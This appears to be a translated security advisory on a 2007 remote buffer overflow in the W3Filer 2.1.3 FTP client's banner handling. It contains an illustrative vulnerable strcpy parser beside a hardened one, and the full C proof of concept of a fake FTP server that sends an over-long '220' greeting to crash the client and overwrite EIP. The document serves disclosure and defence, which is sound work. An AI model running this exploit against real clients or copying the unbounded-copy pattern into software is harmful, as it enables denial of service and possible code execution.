Security Research

Security Vulnerabilities
W3Filer Banner Handling Remote Buffer Overflow Vulnerability

Release date: 2007-06-29
Updated: 2007-07-02

Affected systems:
Satyavrat Mehrotra W3Filer 2.1.3
Description:
BUGTRAQ ID: 24709

W3Filer is a small file download utility.

W3Filer does not bound the length of the banner (server greeting) it reads when connecting to a server. A remote attacker who controls the server the client connects to can exploit this to crash the tool. The published PoC overwrites EIP with the attacker's bytes, so control-flow hijack is not excluded, but only denial of service is demonstrated.

If the W3Filer client receives a very large banner while attempting to send a file (the PoC below acts as a fake FTP server and returns an over-long "220" greeting), a buffer overflow is triggered. The application either hangs, so the user has to kill the process, or it crashes immediately with an exception report. Note that the greeting is received before any authentication, so no credentials are needed to reach the bug.
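The advisory does not publish W3Filer's own source, so the following is an added example (not W3Filer code and not part of the original advisory) of the bug class it describes: an FTP client that copies the server's greeting line into a fixed-size stack buffer without a length check, next to a hardened parser that refuses a line that would not fit and validates the RFC 959 reply-code syntax. The buffer size BANNER_MAX (256) is an assumption chosen for illustration; build_evil_banner() reproduces the PoC's payload layout ("220 " + A's + CRLF, 1499 bytes) so the two parsers can be compared on the same constructed input.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the client's banner buffer. W3Filer's real buffer size is
 * not published in the advisory; 256 is a stand-in for illustration. */
#define BANNER_MAX 256

/* Vulnerable shape, as the advisory describes it: the reply line is copied
 * into a fixed stack buffer with no length check. A line longer than
 * BANNER_MAX overwrites the saved return address (the "EIP overwritten with
 * A's" of the PoC). main() therefore only feeds it a benign banner. */
int vuln_parse_banner(const char *reply)
{
    char line[BANNER_MAX];
    strcpy(line, reply);                 /* unbounded copy: the bug */
    return (int)strtol(line, NULL, 10);
}

/* Hardened parser: locates the end of the first line, rejects anything that
 * would not fit in the buffer instead of copying it, and checks the
 * RFC 959 reply syntax (three digits, then ' ' or '-'). Returns the
 * three-digit code, or -1 on any malformed or over-long input. */
int safe_parse_banner(const char *reply, size_t reply_len)
{
    char line[BANNER_MAX];
    const char *lf = memchr(reply, '\n', reply_len);
    size_t len;

    if (lf == NULL)
        return -1;                       /* no terminator in what we received */
    len = (size_t)(lf - reply) + 1;
    if (len >= sizeof line)
        return -1;                       /* would overflow: refuse, do not truncate silently */
    memcpy(line, reply, len);
    line[len] = '\0';

    if (len < 4 || !isdigit((unsigned char)line[0]) || !isdigit((unsigned char)line[1])
        || !isdigit((unsigned char)line[2]) || (line[3] != ' ' && line[3] != '-'))
        return -1;
    return (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
}

/* Builds the same payload the PoC sends: "220 " + 'A's + "\r\n", in a buffer of
 * `size` bytes (size - 1 characters plus the terminating NUL).
 * Returns the resulting string length (1499 for size == 1500). */
size_t build_evil_banner(char *buf, size_t size)
{
    memset(buf, 'A', size);
    memcpy(buf, "220 ", 4);
    memcpy(buf + size - 3, "\r\n\0", 3);
    return strlen(buf);
}

int main(void)
{
    /* Constructed sample banners, not captured traffic. */
    const char benign[] = "220 smehrsoft FTP ready\r\n";
    char evil[1500];
    size_t n = build_evil_banner(evil, sizeof evil);

    printf("benign, vulnerable parser: %d\n", vuln_parse_banner(benign));
    printf("benign, hardened parser:   %d\n", safe_parse_banner(benign, sizeof benign - 1));
    printf("evil (%zu bytes), hardened parser: %d\n", n, safe_parse_banner(evil, n));
    return 0;
}
```

The hardened version deliberately returns an error rather than truncating the line: a client that silently truncates a 1499-byte greeting still has to decide what to do with the rest of the stream, and treating an over-long pre-authentication reply as a protocol violation (and closing the connection) is the safer default.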

<* Source: r0ut3r (writ3r@gmail.com) *>

Test method:

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

/*
    W3Filer Buffer Overflow Vulnerability
                      DoS POC

            r0ut3r (writ3r [at] gmail.com)

Version: 2.1.3

Description: If the client receives a large banner when
attempting to send a file the application will freeze,
resulting in the user having to kill the application.
Alternatively the application will immediately crash with
an exception report. Either one of the above happens. The
EIP is overwritten with A's. Version 3.1.3 is not vulnerable.

Timeline:
06/27/2007 - Vulnerability discovered
06/28/2007 - Contacted vendor
06/29/2007 - Public release

This is dedicated to Jeremy Hammond

http://en.wikipedia.org/wiki/Jeremy_Hammond
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 21          /* fake FTP server; point W3Filer at this host to upload */
#define BUFSIZE 1500

int s, c;
struct sockaddr_in sock_addr;

int main(void)
{
    char evilbuf[BUFSIZE];
    int one = 1;

    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == -1)
    {
        perror("[-] socket");
        return 1;
    }
    /* allow quick restarts of the fake server while testing */
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));

    sock_addr.sin_family = AF_INET;
    sock_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    sock_addr.sin_port = htons(PORT);   /* binding port 21 needs root on Unix */

    if (bind(s, (struct sockaddr *)&sock_addr, sizeof(sock_addr)) == -1)
    {
        perror("[-] bind");
        return 1;
    }
    printf("[+] Listening...\n");

    if (listen(s, 5) == -1)
    {
        perror("[-] listen");
        return 1;
    }
    printf("[*] Waiting for client\n");

    c = accept(s, NULL, NULL);
    if (c == -1)
    {
        perror("[-] accept");
        return 1;
    }
    printf("[!] Client connected\n");

    /* Over-long FTP greeting: "220 " followed by A's, CRLF-terminated.
       strlen(evilbuf) is 1499 bytes, far beyond the client's banner buffer. */
    memset(evilbuf, 'A', BUFSIZE);
    memcpy(evilbuf, "220 ", 4);
    memcpy(evilbuf + BUFSIZE - 3, "\r\n\0", 3);
    printf("[+] Attempting buffer overflow\n");

    if (send(c, evilbuf, strlen(evilbuf), 0) == -1)
    {
        printf("[-] Error sending..\n");
        return 1;
    }

    printf("[+] Sent! did it crash?\n");
    close(c);
    close(s);
    return 0;
}

Recommendations:
Vendor patch:

Satyavrat Mehrotra
------------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version. Until a fix is available, only point W3Filer at servers you control or trust: the overflow is triggered by the server's greeting, before any authentication takes place.

http://www.smehrsoft.com/

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.